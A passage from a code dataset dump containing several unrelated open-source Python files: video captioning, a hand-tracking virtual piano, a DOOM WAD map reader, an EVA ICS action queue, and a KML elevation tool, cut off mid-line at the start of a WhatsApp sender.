Config()\r\n opt.caption_data_path = './caption.pth'\r\n opt.model_ckpt = './caption_0914_1947'\r\n opt.use_gpu = False\r\n\r\n data = t.load(opt.caption_data_path)\r\n word2ix, ix2word = data['word2ix'], data['ix2word']\r\n\r\n IMG_NET_MEAN = [0.485, 0.456, 0.406]\r\n IMG_NET_STD = [0.229, 0.224, 0.225]\r\n\r\n normalize = tv.transforms.Normalize(mean=IMG_NET_MEAN, std=IMG_NET_STD)\r\n transforms = tv.transforms.Compose([\r\n tv.transforms.Resize(opt.scale_size),\r\n tv.transforms.CenterCrop(opt.img_size),\r\n tv.transforms.ToTensor(),\r\n normalize\r\n ])\r\n\r\n resnet50 = tv.models.resnet50(True).eval() # 用resnet50提取图像特征\r\n del resnet50.fc\r\n resnet50.fc = lambda x: x # 将全连接层替换为恒等映射\r\n resnet50.avgpool.stride = 7 # 修改average pool步长\r\n\r\n cap_model = CaptionModel(opt, word2ix, ix2word) # 加载图像描述模型\r\n cap_model = cap_model.load(opt.model_ckpt).eval()\r\n\r\n # 为每一帧image生成Caption\r\n tr4s = TextRank4Sentence()\r\n is_resize = True\r\n if max(IMG_SIZE) == 256:\r\n is_resize = False\r\n\r\n print('\\n--processing key frames...')\r\n txts = ''\r\n for frame in tqdm(key_frames):\r\n # 处理每帧图像\r\n frame = Image.fromarray(frame).convert('RGB') # 转换为3通道的格式(RGB)\r\n if is_resize:\r\n frame.resize(IMG_SIZE)\r\n img = transforms(frame).unsqueeze(0)\r\n txts += generate_txt(img, tr4s, resnet50, cap_model, opt.use_gpu)\r\n txts = ''.join(txts.split()) # 去空格\r\n print('all img_txts:\\n', txts) # 字符串数组\r\n\r\n # ----------------文本摘要(有很多算法,这里尝试两种算法,未尝试的算法如seq2seq)\r\n # 算法一: textRank\r\n tr4s.analyze(text=txts, lower=True, source='all_filters')\r\n summary = tr4s.get_key_sentences()[0].sentence + '。' \\\r\n + tr4s.get_key_sentences()[1].sentence + '。' \\\r\n + tr4s.get_key_sentences()[2].sentence + '。' \\\r\n # + tr4s.get_key_sentences()[3].sentence + '。' \\\r\n # + tr4s.get_key_sentences()[4].sentence + '。' # 取3个最重要的句子\r\n \r\n summary = ''.join(summary.split())\r\n print('video caption 1:\\n', summary)\r\n\r\n # 算法二: word2vect based textRank\r\n summary = summarize(txts, 2) # 排序后,取2个句子\r\n sum_2 = ''\r\n for sent in summary:\r\n sum_2 += sent\r\n print('video caption 2:\\n', sum_2)\r\n\r\n # 保存summary\r\n # print('--saving text...')\r\n # txts_path = os.path.join(PATH + 'summary.txt')\r\n # print('txts_path: ', txts_path)\r\n # with open(txts_path, \"w\", encoding='utf-8') as txt_file:\r\n # txt_file.write(txts)\r\n\r\n # if (len(key_frames) != 0):\r\n # cv2.imshow('key_frame example', key_frames[int(len(key_frames) * 0.5)])\r\n # cv2.waitKey()\r\n # else:\r\n # print('[error]: extract key frames failed.')\r\n # return\r\n\r\n\r\n# if __name__ == '__main__':\r\n# video2txt('./actor.mp4', True)\r\n# print('--Test done.')\r\n\r\nif __name__ == '__main__':\r\n if len(sys.argv) != 2:\r\n print(\"Usage: python videoCaption.py input_file\")\r\n sys.exit()\r\n in_file = sys.argv[1]\r\n print('in_file: ', in_file)\r\n video2txt(in_file)\r\n print('--Video caption done.')\r\n","repo_name":"CaptainEven/VideoCaption","sub_path":"videoCaption.py","file_name":"videoCaption.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":156,"dataset":"github-code","pt":"45"} +{"seq_id":"7087459738","text":"import numpy as np\nimport time\nimport cv2\nfrom cvzone.HandTrackingModule import HandDetector\nimport pyglet\n\n\ncap =cv2.VideoCapture(0)\ncap.set(3,1280)\ncap.set(4,720)\n\nwindow = pyglet.window.Window()\ndetector =HandDetector(detectionCon=0.8)\n\nkeys=[[\"C\",\"D\",'E',\"F\",\"G\",\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"A\",\"B\"],[\"C#\",\"D#\",\"F#\",\"G#\",\"A#\",\"C#\",\"D#\",\"F#\",\"G#\",\"A#\"]]\n\nclass Button():\n def __init__(self,pos,text,size,color):\n self.pos=pos\n self.size=size\n self.text=text\n self.color=color\nbuttonList=[]\nfor i in range(len(keys)):\n for j,key in enumerate(keys[i]): \n if i==0:\n buttonList.append(Button([38*j+15,80],key,[35,100],(255,255,255)))\n else:\n buttonList.append(Button([(40+j)*j+25,80],key,[35,50],(0,0,0))) \n\ndef playkeys(button):\n if button.text==\"A\":\n \n effectA=pyglet.resource.media(\"A.wav\",streaming=False)\n effectA.play()\n \n \n elif button.text==\"B\":\n \n effectB=pyglet.resource.media(\"B.wav\",streaming=False)\n effectB.play()\n \n elif button.text==\"C\":\n \n effectC=pyglet.resource.media(\"C.wav\",streaming=False)\n effectC.play()\n elif button.text==\"D\":\n \n effectD=pyglet.resource.media(\"D.wav\",streaming=False)\n effectD.play()\n elif button.text==\"E\":\n \n effectE=pyglet.resource.media(\"E.wav\",streaming=False)\n effectE.play()\n \n\n elif button.text==\"F\":\n \n effectF=pyglet.resource.media(\"F.wav\",streaming=False)\n effectF.play()\n elif button.text==\"G\":\n \n effectG=pyglet.resource.media(\"G.wav\",streaming=False)\n effectG.play() \n\n\ndef drawAll(img,buttonList):\n for button in buttonList:\n x,y=button.pos\n w,h=button.size\n colorr=button.color\n cv2.rectangle(img,button.pos,(x+w,y+h),colorr,cv2.FILLED)\n cv2.putText(img,button.text,(x+10,y+h-10),cv2.FONT_HERSHEY_COMPLEX,0.5,(214,0,220),2)\n return img \n\nwhile True:\n success,img=cap.read()\n\n\n\n img= detector.findHands(img)\n lmlist,bboxInfo=detector.findPosition(img)\n img=drawAll(img,buttonList)\n if lmlist: #hand is there\n for button in buttonList:\n x,y=button.pos\n w,h=button.size\n \n for f in [4,8,12,16,20]:\n\n if x 0\n\n def clear_flag(s, flag):\n assert flag in Thing.FLAGBIT\n n = Thing.FLAGBIT[flag]\n s.options &= ~(1 << n)\n return s\n\n def set_all_difficulties(s):\n s.set_flag('Easy')\n s.set_flag('Medium')\n return s.set_flag('Hard')\n\nclass Vertex(SimpleStruct):\n FIELDS = [\n ('x', 'short'),\n ('y', 'short'),\n ]\n def get_fields(s): return Vertex.FIELDS\n\nclass Sector(SimpleStruct):\n\n FIELDS = [\n ('floor_height' , 'short') , \n ('ceil_height' , 'short') , \n ('floor_pic' , 'string8') , \n ('ceil_pic' , 'string8') , \n ('light_level' , 'short') , \n ('special_sector' , 'short') , \n ('tag' , 'short') , \n ]\n\n def get_fields(s): return Sector.FIELDS\n\n def has_all_textures(s):\n return len(s.floor_pic) > 1 and len(s.ceil_pic) > 1\n\nclass LineDef(SimpleStruct):\n\n FLAGBIT = {\n \"Impassible\" : 0,\n \"Block Monsters\" : 1,\n \"Two-sided\" : 2,\n \"Upper Unpegged\" : 3,\n \"Lower Unpegged\" : 4,\n \"Secret\" : 5,\n \"Block Sound\" : 6,\n \"Not on Map\" : 7,\n \"Already on Map\" : 8 }\n\n FIELDS = [\n ('vert0', 'short'),\n ('vert1', 'short'),\n ('flags', 'short'),\n ('function', 'short'),\n ('tag', 'short'),\n ('sd_right', 'short'),\n ('sd_left', 'short'),\n ]\n\n def get_fields(s):\n return LineDef.FIELDS\n\n def set_flag(s, flag):\n assert flag in LineDef.FLAGBIT\n n = LineDef.FLAGBIT[flag]\n s.flags |= 1 << n\n return s\n\n def get_flag(s, flag):\n assert flag in LineDef.FLAGBIT\n n = LineDef.FLAGBIT[flag]\n return (s.flags & 1 << n) > 0\n\n def clear_flag(s, flag):\n assert flag in LineDef.FLAGBIT\n n = LineDef.FLAGBIT[flag]\n s.flags &= ~(1 << n)\n return s\n\n def flip_orientation(s):\n (s.vert0, s.vert1) = (s.vert1, s.vert0)\n (s.sd_right, s.sd_left) = (s.sd_left, s.sd_right)\n\nclass SideDef(SimpleStruct):\n\n FIELDS = [\n ('xofs', 'short'),\n ('yofs', 'short'),\n ('uppertex', 'string8'),\n ('lowertex', 'string8'),\n ('midtex', 'string8'),\n ('sector', 'short'),\n ]\n\n def get_fields(s): return SideDef.FIELDS\n\n def has_all_textures(s):\n return len(s.uppertex) > 1 and len(s.midtex) > 1 and len(s.lowertex)> 1\n\n def set_clear_textures(s):\n s.midtex = '-'\n s.uppertex = '-'\n s.lowertex = '-'\n\nclass DummyLump():\n \"\"\" Used for directory markers, like levels \"\"\"\n\n def __init__(s, name):\n s.name = name\n\n def get_name(s):\n return s.name\n\n def get_size(s):\n return 0\n\n def write(s, io): pass\n\ndef get_color_for_thing(thing_type):\n if thing_type not in THING_TABLE:\n print(f'WARNING: unknown thing type {thing_type}')\n return None\n type_desc = THING_TABLE[thing_type].lower()\n if 'player' in type_desc and 'start' in type_desc:\n return 'g'\n if 'key' in type_desc:\n if 'blue' in type_desc:\n return 'b'\n elif 'red' in type_desc:\n return 'r'\n elif 'yellow' in type_desc:\n return 'y'\n else:\n return None\n\ndef get_color_for_linedef(ld):\n if ld.function in (26, 32):\n return 'b'\n elif ld.function in (28, 33):\n return 'r'\n elif ld.function in (27, 34):\n return 'y'\n elif ld.get_flag('Two-sided'):\n return '0.8'\n else:\n return 'k'\n\nclass ArrayLump:\n\n def __init__(s, name, array):\n s.name = name\n s.array = array\n assert type(s.array) == list\n\n def write(s, io):\n io.write_array_lump(s.array)\n\n def get_size(s):\n if len(s.array) == 0:\n return 0\n else:\n return len(s.array) * s.array[0].get_size()\n\n def get_name(s):\n return s.name\n\nclass Map:\n\n def __init__(s, name):\n s.clear()\n s.name = name\n\n def __str__(s):\n return '%s: %d verts, %d sectors, %d sides, %d lines' % (s.name, len(s.verts), len(s.sectors), len(s.sidedefs), len(s.linedefs))\n\n def clear(s):\n s.name = None\n s.things = []\n s.verts = []\n s.linedefs = []\n s.sidedefs = []\n s.sectors = []\n\n def get_size(s):\n xx = [v.x for v in s.verts]\n yy = [v.y for v in s.verts]\n dx = max(xx) - min(xx)\n dy = max(yy) - min(yy)\n return (dx, dy)\n\n def plot(s):\n return s.plot(1.0)\n\n def plot_partial(s, height_over_width, linechance):\n linewidth = 1.0\n\n print('plotting %d things, %d lines' % (len(s.things), len(s.linedefs)))\n for t in s.things:\n color = get_color_for_thing(t.type)\n if color:\n pyplt.plot([t.x], [t.y], '.', color=color)\n\n color2lds = {}\n for ld in s.linedefs:\n color = get_color_for_linedef(ld)\n if not color in color2lds:\n color2lds[color] = []\n color2lds[color].append(ld)\n\n for (color, lds) in color2lds.items():\n xx = []\n yy = []\n nan = float('nan')\n for ld in lds:\n p0 = s.verts[ld.vert0]\n p1 = s.verts[ld.vert1]\n xx += [p0.x, p1.x, nan]\n yy += [p0.y, p1.y, nan]\n pyplt.plot( xx, yy, '-', color=color, linewidth=0.5)\n\n # make it square\n xx = [v.x for v in s.verts]\n yy = [v.y for v in s.verts]\n dx = max(xx) - min(xx)\n dy = max(yy) - min(yy)\n L = max(dx, dy) * 1.1\n cx = (max(xx)+min(xx))/2.0\n cy = (max(yy)+min(yy))/2.0\n left = cx - L/2.0/height_over_width\n right = cx + L/2.0/height_over_width\n top = cy + L/2.0\n bot = cy - L/2.0\n pyplt.xlim([ left, right ])\n pyplt.ylim([ bot, top ])\n\n print('done')\n\n def unique_textures(s):\n uniqs = set()\n for sd in s.sidedefs:\n uniqs.add(sd.uppertex)\n uniqs.add(sd.lowertex)\n uniqs.add(sd.midtex)\n return uniqs\n\n LUMP_TO_ELEMENT_CLASS = {\n 'THINGS' : Thing,\n 'VERTEXES' : Vertex,\n 'LINEDEFS' : LineDef,\n 'SIDEDEFS' : SideDef,\n 'SECTORS' : Sector,\n }\n\n def handle_lump(s, io, lump, lumpend):\n name = lump.name\n if name == 'THINGS':\n s.things += io.read_array_lump(lumpend, Thing)\n elif name == 'VERTEXES':\n s.verts += io.read_array_lump(lumpend, Vertex)\n elif name == 'LINEDEFS':\n s.linedefs += io.read_array_lump(lumpend, LineDef)\n elif name == 'SIDEDEFS':\n s.sidedefs += io.read_array_lump(lumpend, SideDef)\n elif name == 'SECTORS':\n s.sectors += io.read_array_lump(lumpend, Sector)\n else:\n return False\n return True\n\n def append_lumps_to(s, lumps):\n lumps += [\n DummyLump(s.name),\n ArrayLump('THINGS', s.things),\n ArrayLump('VERTEXES', s.verts),\n ArrayLump('LINEDEFS', s.linedefs),\n ArrayLump('SIDEDEFS', s.sidedefs),\n ArrayLump('SECTORS', s.sectors),\n ]\n\n def add_player_start(s, x, y, angle):\n t = Thing().fill([x, y, angle, 1, 0])\n s.things += [t]\n\n def sanity_asserts(s):\n print('checking %d verts for dupes' % len(s.verts))\n uniqverts = set()\n for v in s.verts:\n v2 = utils.Int2(v.x, v.y)\n uniqverts.add(v2)\n assert( len(uniqverts) == len(s.verts) )\n print('done')\n\n# check linedefs\n for ld in s.linedefs:\n assert ld.sd_right != None and ld.sd_right >= 0\n assert ld.sd_right != ld.sd_left\n\n for sd in s.sidedefs:\n assert sd.sector != None and sd.sector >= 0\n\nclass WADContent:\n \"\"\" Should contain all essential contents of a WAD \"\"\"\n\n def __init__(s):\n s.maps = []\n s.other_lumps = []\n s.end_msg = None\n\n def read_lumps( s, directory, wad ):\n mapp = None\n \n for entry in directory:\n wad.f.seek(entry.filepos)\n lumpend = wad.f.tell() + entry.size\n name = entry.name\n\n if wad.is_map_start_lump(name):\n assert entry.size == 0, name\n print('reading map ' + entry.name)\n mapp = Map(entry.name)\n s.maps += [mapp]\n\n elif mapp and mapp.handle_lump(wad, entry, lumpend):\n # no need to do anything - it handled it\n pass\n \n elif name == 'ENDOOM':\n # sanity check\n assert entry.size == 4000\n s.end_msg = wad.f.read(4000)\n\n else:\n # ignore this lump\n pass\n\ndef enum_map_names(path):\n \"\"\" This will yield (lumpinfo, wadfile) tuples for each lump \"\"\"\n with open(path, 'rb') as f:\n wad = WADFile(f)\n\n header = f.read(4).decode('ascii')\n num_lumps = wad.read_long()\n dir_offset = wad.read_long()\n\n assert header == 'IWAD' or header == 'PWAD', header\n\n # read directory\n f.seek(dir_offset)\n infosize = LumpInfo().get_size()\n end = f.tell() + num_lumps * infosize\n directory = wad.read_array_lump(end, LumpInfo)\n\n for entry in directory:\n if is_map_start_lump(entry.name):\n yield entry.name\n\ndef load(path):\n \"\"\" This will yield (lumpinfo, wadfile) tuples for each lump \"\"\"\n with open(path, 'rb') as f:\n wad = WADFile(f)\n\n header = f.read(4).decode('ascii')\n num_lumps = wad.read_long()\n dir_offset = wad.read_long()\n\n assert header == 'IWAD' or header == 'PWAD', header\n\n # read directory\n f.seek(dir_offset)\n infosize = LumpInfo().get_size()\n end = f.tell() + num_lumps * infosize\n directory = wad.read_array_lump(end, LumpInfo)\n\n # lumps\n rv = WADContent()\n rv.read_lumps( directory, wad )\n return rv\n\ndef save(path, header, lumps):\n with open(path, 'wb') as fout:\n \"\"\" Writes an array of lumps to a *single* WAD file, handling proper directory setup, etc. \"\"\"\n io = WADFile(fout)\n fout.write('PWAD'.encode('ascii'))\n io.write_long( len(lumps) )\n\n # dir offset\n total_lump_size = sum([ lump.get_size() for lump in lumps])\n dir_offset = 4 + 4 + 4 + total_lump_size\n io.write_long( dir_offset )\n\n # write lumps while bookeeping\n lumpstart = 4 + 4 + 4\n directory = []\n\n print('dir off set = %d' % dir_offset)\n\n for lump in lumps:\n # print('start = %d, tell = %d' % (lumpstart, fout.tell()))\n assert lumpstart == fout.tell()\n lump.write(io)\n\n # create dir entry\n entry = LumpInfo()\n entry.clear()\n entry.name = lump.get_name()\n entry.size = lump.get_size()\n entry.filepos = lumpstart\n\n directory += [entry]\n print('%d += %d' % (lumpstart, entry.size))\n lumpstart += entry.size\n\n assert lumpstart == dir_offset\n io.write_array_lump(directory)\n\n\ndef save_map_png(mapp, fname):\n return save_map_png_partial( mapp, fname, 1.0 )\n\ndef save_map_png_partial(mapp, fname, linechance):\n w_inches = 10\n h_inches = 8\n pyplt.figure(figsize=(w_inches, h_inches))\n mapp.plot_partial(h_inches/w_inches, linechance)\n pyplt.savefig(fname, dpi=512)\n print('done plotting to %s' % fname)\n pyplt.close()\n\ndef test_dump_doom1_pngs():\n path = dero_config.DOOM1_WAD_PATH\n content = load(path)\n\n assert len(content.maps) == 36\n assert content.end_msg\n\n for i in range(len(content.maps)):\n save_map_png(content.maps[i], 'doom1-map-' + str(i) + '.png')\n\ndef test_doom1_wad():\n path = dero_config.DOOM1_WAD_PATH\n content = load(path)\n\n assert len(content.maps) == 36\n assert content.end_msg\n e1m1 = content.maps[0]\n\n # create square map\n m3 = create_square_map(e1m1)\n lumps = []\n m3.append_lumps_to(lumps)\n save('square.wad', 'PWAD', lumps)\n dero_config.build_wad( 'square.wad', 'square-built.wad' )\n\n # filter out all things except player start\n e1m1.things = [t for t in e1m1.things if t.type == 1]\n\n # make all floors use FLAT5_3\n for s in e1m1.sectors:\n s.floor_pic = 'FLAT5_3'\n\n # print out all unique LD functions\n funcs = set([ ld.function for ld in e1m1.linedefs] )\n print('unique functions: ' + str(funcs))\n\n # write the map back\n lumps = []\n e1m1.append_lumps_to(lumps)\n save('%s.wad' % e1m1.name, 'PWAD', lumps)\n\n # run bsp on it\n dero_config.build_wad( '%s.wad' % e1m1.name, f'{e1m1.name}-built.wad' )\n\n # read it back\n cont2 = load('%s.wad' % e1m1.name)\n assert len(cont2.maps) == 1\n assert cont2.end_msg == None\n _map2 = cont2.maps[0]\n assert _map2.name == e1m1.name\n assert len(_map2.verts) == len(e1m1.verts)\n assert len(_map2.linedefs) == len(e1m1.linedefs)\n assert len(_map2.things) == 1\n\n # draw maps for comparison\n save_map_png( e1m1, 'expected.png')\n save_map_png( _map2, 'actual.png')\n\ndef create_square_map(ref):\n\n L = 200\n rv = Map('E1M1')\n rv.add_player_start(L//2,L//2,0)\n rv.verts = [\n Vertex().fill([0,0]),\n Vertex().fill([0,L]),\n Vertex().fill([L,L]),\n Vertex().fill([L,0]),\n Vertex().fill([0,2*L]),\n Vertex().fill([L,2*L]),\n ]\n\n random.seed(42)\n\n valid_sec_ids = [sid for sid in range(len(ref.sectors)) if ref.sectors[sid].has_all_textures()]\n ref_sec_id = random.choice(valid_sec_ids)\n ref_sec_id2 = random.choice(valid_sec_ids)\n refsec = ref.sectors[ref_sec_id]\n refsec2 = ref.sectors[ref_sec_id2]\n\n rv.sectors = [\n Sector().fill([0, 100, refsec.floor_pic, refsec.ceil_pic, 200, 0, 0]),\n Sector().fill([16, 16, refsec2.floor_pic, refsec2.ceil_pic, 200, 0, 0]),\n ]\n\n exit_lds = [ld for ld in ref.linedefs if ld.function == 11]\n exit_sd = ref.sidedefs[ exit_lds[0].sd_right ]\n print('exit ld = ', exit_lds[0])\n print('exit sd = ', exit_sd)\n\n refsd = random.choice([sd for sd in ref.sidedefs if sd.has_all_textures()])\n refsd2 = random.choice([sd for sd in ref.sidedefs if sd.has_all_textures()])\n print('refsd', refsd)\n print('refsd2', refsd2)\n\n rv.sidedefs = [\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, refsd.midtex, 0]), # 0\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, refsd.midtex, 0]), # 1\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, refsd.midtex, 0]), # 2\n SideDef().fill([0, 0, refsd.uppertex, refsd.lowertex, '-', 0]), # 3\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, '-', 1]), # 4\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, refsd2.midtex, 1]), # 5\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, refsd2.midtex, 1]), # 6\n SideDef().fill([0, 0, refsd2.uppertex, refsd2.lowertex, refsd2.midtex, 1]), # 7\n ]\n\n \"\"\"\n 4 5\n\n 1 2\n\n 0 3\n \"\"\"\n\n rv.linedefs = [\n LineDef().fill([2, 3, 0, 0, 0, 0, -1]).set_flag('Impassible'),\n LineDef().fill([3, 0, 0, 0, 0, 1, -1]).set_flag('Impassible'),\n LineDef().fill([0, 1, 0, 0, 0, 2, -1]).set_flag('Impassible'),\n LineDef().fill([1, 2, 0, 31, 0, 3, 4]).set_flag('Impassible').clear_flag('Impassible').set_flag('Two-sided'),\n LineDef().fill([1, 4, 0, 0, 0, 5, -1]).set_flag('Impassible').set_flag('Lower Unpegged'),\n LineDef().fill([4, 5, 0, 0, 0, 6, -1]).set_flag('Impassible').set_flag('Lower Unpegged'),\n LineDef().fill([5, 2, 0, 0, 0, 7, -1]).set_flag('Impassible').set_flag('Lower Unpegged'),\n ]\n\n print('FOO')\n print(str(exit_sd))\n\n\n return rv\n\nif __name__ == \"__main__\":\n test_doom1_wad()\n # test_dump_doom1_pngs()\n","repo_name":"stevesan/dero","sub_path":"wad.py","file_name":"wad.py","file_ext":"py","file_size_in_byte":21108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"31786081","text":"__author__ = \"Altertech Group, https://www.altertech.com/\"\n__copyright__ = \"Copyright (C) 2012-2021 Altertech Group\"\n__license__ = \"Apache License 2.0\"\n__version__ = \"3.4.2\"\n\nimport threading\nfrom queue import PriorityQueue\nimport logging\nimport eva.core\nimport eva.item\nimport time\nimport asyncio\n\nfrom neotasker import BackgroundIntervalWorker, BackgroundQueueWorker\n\n\nclass ActiveItemQueue(object):\n\n def __init__(self,\n queue_id,\n keep_history=None,\n default_priority=100,\n enterprise_layout=False):\n self.default_priority = default_priority\n self.q_id = queue_id\n self.keep_history = keep_history\n\n self.actions = []\n self.actions_by_id = {}\n self.actions_by_item_id = {}\n self.actions_by_item_full_id = {}\n\n self.actions_lock = threading.RLock()\n\n self.action_processor = None\n\n self.enterprise_layout = enterprise_layout\n\n self.action_cleaner = None\n self.action_processor = None\n\n def put_task(self, action, priority=None):\n if priority:\n p = priority\n else:\n p = self.default_priority\n if self.keep_history:\n self.history_append(action)\n if action.set_pending():\n self.action_processor.put_threadsafe(action)\n return True\n return False\n\n def serialize(self):\n d = []\n if not self.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::serialize_action locking broken')\n eva.core.critical()\n return\n try:\n _actions = self.actions.copy()\n except:\n eva.core.log_traceback()\n finally:\n self.actions_lock.release()\n for a in _actions:\n d.append(a.serialize())\n return d\n\n def history_get(self, action_uuid):\n try:\n if action_uuid in self.actions_by_id:\n return self.actions_by_id[action_uuid]\n except:\n return None\n\n def history_append(self, action):\n if not self.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::history_append locking broken')\n eva.core.critical()\n return False\n try:\n self.actions.append(action)\n self.actions_by_id[action.uuid] = action\n if not self.enterprise_layout:\n self.actions_by_item_id.setdefault(action.item.item_id,\n []).append(action)\n self.actions_by_item_full_id.setdefault(action.item.full_id,\n []).append(action)\n return True\n except:\n eva.core.log_traceback()\n return False\n finally:\n self.actions_lock.release()\n\n def history_remove(self, action):\n if not self.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::history_remove locking broken')\n eva.core.critical()\n return False\n try:\n if not self.enterprise_layout:\n self.actions_by_item_id[action.item.item_id].remove(action)\n self.actions_by_item_full_id[action.item.full_id].remove(action)\n self.actions.remove(action)\n del self.actions_by_id[action.uuid]\n return True\n except:\n eva.core.log_traceback()\n return False\n finally:\n self.actions_lock.release()\n\n def start(self):\n if self.keep_history is None:\n self.keep_history = eva.core.config.keep_action_history\n self.action_cleaner_interval = eva.core.config.action_cleaner_interval\n\n self.action_cleaner = BackgroundIntervalWorker(\n fn=action_cleaner,\n name='primary_action_cleaner',\n delay=self.action_cleaner_interval,\n o=self,\n on_error=eva.core.log_traceback,\n loop='cleaners')\n self.action_cleaner.start()\n self.action_processor = BackgroundQueueWorker(\n fn=action_processor,\n name='primary_action_processor',\n on_error=eva.core.log_traceback,\n queue=asyncio.queues.PriorityQueue,\n o=self)\n self.action_processor.start()\n\n def stop(self):\n self.action_cleaner.stop()\n self.action_processor.stop()\n\n def process_action(self, action):\n return action.item.q_put_task(action)\n\n\nasync def action_processor(action, **kwargs):\n if not action.item:\n return\n o = kwargs.get('o')\n logging.debug('new action to toss, uuid: %s, priority: %u' % \\\n (action.uuid, action.priority))\n try:\n if o.process_action(action):\n logging.debug(\n 'action %s requeued into local queue of %s' % \\\n (action.uuid, action.item.full_id))\n else:\n logging.debug(\n 'action %s failed to requeue into local queue of %s' %\\\n (action.uuid, action.item.full_id))\n except:\n eva.core.log_traceback()\n\n\nasync def action_cleaner(**kwargs):\n o = kwargs.get('o')\n if not o.actions_lock.acquire(timeout=eva.core.config.timeout):\n logging.critical('ActiveItemQueue::_t_action_cleanup locking broken')\n eva.core.critical()\n return\n logging.debug('cleaning old actions')\n try:\n _actions = o.actions.copy()\n except:\n _actions = []\n eva.core.log_traceback()\n finally:\n o.actions_lock.release()\n for a in _actions:\n try:\n tk = list(a.time.keys()).copy()\n except:\n eva.core.log_traceback()\n maxtime = 0\n for t in tk:\n try:\n maxtime = max(maxtime, a.time[t])\n except:\n pass\n if maxtime and maxtime < time.time() - o.keep_history:\n if a.is_finished():\n logging.debug(\n '%s action %s too old, removing' % \\\n (o.q_id, a.uuid))\n o.history_remove(a)\n else:\n logging.warning(\n '%s action %s too old, status is %s ' % \\\n (o.q_id, a.uuid,\n eva.item.ia_status_names[a.status]))\n","repo_name":"alttch/eva3","sub_path":"lib/eva/itemqueue.py","file_name":"itemqueue.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"44"} +{"seq_id":"21879524913","text":"import osr, os, affine, time\nfrom gdalconst import *\nfrom osgeo import gdal\n\ndef path_join(str):\n py_path = os.path.dirname(os.path.realpath(__file__))\n abs_path = os.path.join(py_path,str) \n if os.path.isfile(abs_path):\n return abs_path \n else:\n print('[Alarm] File not exist:{}\\n'.format(abs_path ))\n return abs_path \n\n\ndef retrieve_pixel_value(geo_coord, data_source):\n \"\"\"Return floating-point value that corresponds to given point.\"\"\"\n x, y = geo_coord[0], geo_coord[1]\n forward_transform = affine.Affine.from_gdal(*data_source.GetGeoTransform())\n reverse_transform = ~forward_transform\n px, py = reverse_transform * (x, y)\n px, py = int(px + 0.5), int(py + 0.5)\n pixel_coord = px, py\n data_array = np.array(data_source.GetRasterBand(1).ReadAsArray())\n # i = data_array[0]\n # j = data_array[1]\n return(data_array[pixel_coord[1]][pixel_coord[0]])\n\n \n# retuen lon list and lat list from kml file\ndef get_lon_lat(file_in, file_out, data):\n kml = [] \n with open(file_in, 'r', encoding='utf8') as origin:\n with open(file_out, 'w', encoding='utf8') as out:\n num = 0\n for line in origin.readlines(): \n if num == 1 :\n out.write('\\t\\t\\t\\t\\t\\t\\t')\n for j in line.split():\n if j != '':\n xlon = float(j.split(',')[0])\n xlat = float(j.split(',')[1])\n print(xlon, xlat)\n h = str(retrieve_pixel_value((xlon, xlat), data)+0.7) \n out.write(j.split(',')[0] + ',' + j.split(',')[1] + ',' + h + ' ') \n kml.append(j.split(',')[0] + ',' + j.split(',')[1] + ',' + h + '\\n')\n out.write('')\n num = 0\n else: \n out.write(line) \n \n if line.find('') > 0:\n num = 1\n print('[OK] write kml.\\n')\n return kml\n\ndef pixelcoord(x, y):\n \"\"\"Returns coordinates X Y from pixel\"\"\"\n xp = a * x + b * y + minX\n yp = d * x + e * y + minY\n return xp, yp\n\ndef print_dem_value(file):\n data = gdal.Open(file, GA_ReadOnly)\n raster = data.GetRasterBand(1)\n width = data.RasterXSize\n height = data.RasterYSize\n gt = data.GetGeoTransform()\n minX = gt[0]\n minY = gt[3] + width*gt[4] + height*gt[5] \n maxX = gt[0] + width*gt[1] + height*gt[2]\n maxY = gt[3] \n\n # print (\"the domain :\" , \"[\" ,minX,\";\",maxX,\"]\",\"[\", minY,\";\",maxY ,\"]\")\n\n # showing a 2D image of the topo\n # plt.imshow(data, cmap='gist_earth',extent=[minx, maxx, miny, maxy])\n # plt.show()\n\n # elevation 2D numpy array\n elevation = raster.ReadAsArray()\n\n a = gt[1]\n b = gt[2]\n d = gt[4]\n e = gt[5] \n \n for i in range(height):\n for j in range(width):\n xp = a * i + b * j + minX\n yp = d * i + e * j + minY\n if elevation[i][j] != -32767:\n print(xp , yp, elevation[i][j])\n\ndef write_it(file, list):\n with open(file, 'w') as f:\n for line in list: \n f.write(line)\n \n\ndef main(): \n start_time = time.time() \n # kml_file = path_join('t.kml')\n # kml_out = path_join('kml_add.kml')\n # dem_file = path_join('dem_410_wgs84.tif')\n # test_file = path_join('test.txt')\n \n f = r'C:\\Users\\RSLAB\\Desktop\\臺北市北投區行義段一小段506等\\20190314_臺北市北投區行義段一小段506、507、509、510、511、514地號等六筆土地宗祠新建工程水土保持計畫_wgs84.tif'\n k0 = r'C:\\Users\\RSLAB\\Desktop\\臺北市北投區行義段一小段506等\\doc.kml'\n k1 = r'C:\\Users\\RSLAB\\Desktop\\臺北市北投區行義段一小段506等\\add_doc.kml'\n\n # print_dem_value(dem_file)\n data = gdal.Open(f, GA_ReadOnly)\n array = get_lon_lat(k0, k1, data)\n # write_it(test_file, array)\n \n \n print(\"--- %s seconds ---\" % (time.time() - start_time))\n \nmain()","repo_name":"kkl918/Python-Tool","sub_path":"ori_kml_add_height.py","file_name":"ori_kml_add_height.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27215279887","text":"import requests\nimport json\n\ndef SendMessageWhatsapp(data):\n try:\n token = 